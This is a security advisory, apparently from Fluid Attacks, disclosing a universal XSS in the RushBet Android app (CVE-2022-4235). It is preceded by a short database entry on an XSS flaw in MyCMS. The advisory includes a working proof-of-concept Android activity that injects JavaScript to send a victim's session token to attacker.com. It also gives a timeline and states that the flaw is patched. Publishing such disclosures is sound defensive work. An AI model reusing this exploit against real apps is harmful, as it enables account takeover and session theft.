A vulnerability was found in MyCMS. It has been classified as problematic. This affects the function build_view of the file lib/gener/view.php of the component Visitors Module. The manipulation of the argument original/converted leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is d64fcba4882a50e21cdbec3eb4a080cb694d26ee. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218895.

CVE-2022-4892

RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.

**Summary**

**Name**

RushBet 2022.23.1-b490616d - UXSS

**Code name**

Miller

**Product**

RushBet

**Affected versions**

Version 2022.23.1-b490616d

**State**

Public

**Release date**

2023-01-10

**Vulnerability**

**Kind**

Universal XSS

**Rule**

429\. Universal XSS (UXSS)

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N

**CVSSv3 Base Score**

6.0

**Exploit available**

Yes

**CVE ID(s)**

CVE-2022-4235

**Description**

RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.

**Vulnerability**

This vulnerability occurs because the application exposes an activity and does not properly validate the data it receives.

**Exploitation**

To exploit this vulnerability, the victim must have a malicious application installed with activity like the following:

**MainActivity.java**

    package com.example.badapp;
    
    import androidx.appcompat.app.AppCompatActivity;
    import android.content.Intent;
    import android.os.Handler;
    import android.os.Bundle;
    import android.net.Uri;
    
    public class MainActivity extends AppCompatActivity {
    
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
    
            Intent intent = new Intent("android.intent.action.VIEW");
            intent.setClassName("com.rush.co.rb","com.sugarhouse.casino.MainActivity");
            intent.setData(Uri.parse("https://rushbet.co/"));
            startActivity(intent);
    
            new Handler().postDelayed(() -> {
                intent.setAction("Action.EvaluateScript");
                intent.putExtra("KeyScript","fetch('https://attacker.com/sessionID/'+JSON.parse(sessionStorage.getItem('session-COP')).value);");
                startActivity(intent);
            }, 30000);
        }
    }
    

Thus, when the victim opens the malicious app, the exploit will be executed, thus hacking his account.

**Evidence of exploitation**

POC-Account-Takeover-Rushbet

**Our security policy**

We have reserved the CVE-2022-4235 to refer to this issue from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: RushBet 2022.23.1-b490616d
    
*   Operating System: GNU/Linux
    

**Mitigation**

An updated version of RushBet is available at the vendor page.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://www.rushbet.co

**Timeline**

2022-11-29

Vulnerability discovered.

2022-11-30

Vendor contacted.

2022-12-03

Vendor replied acknowledging the report.

2022-12-03

Vendor Confirmed the vulnerability.

2022-12-14

Vulnerability patched.

2023-01-10

Public Disclosure.

Tag

#xss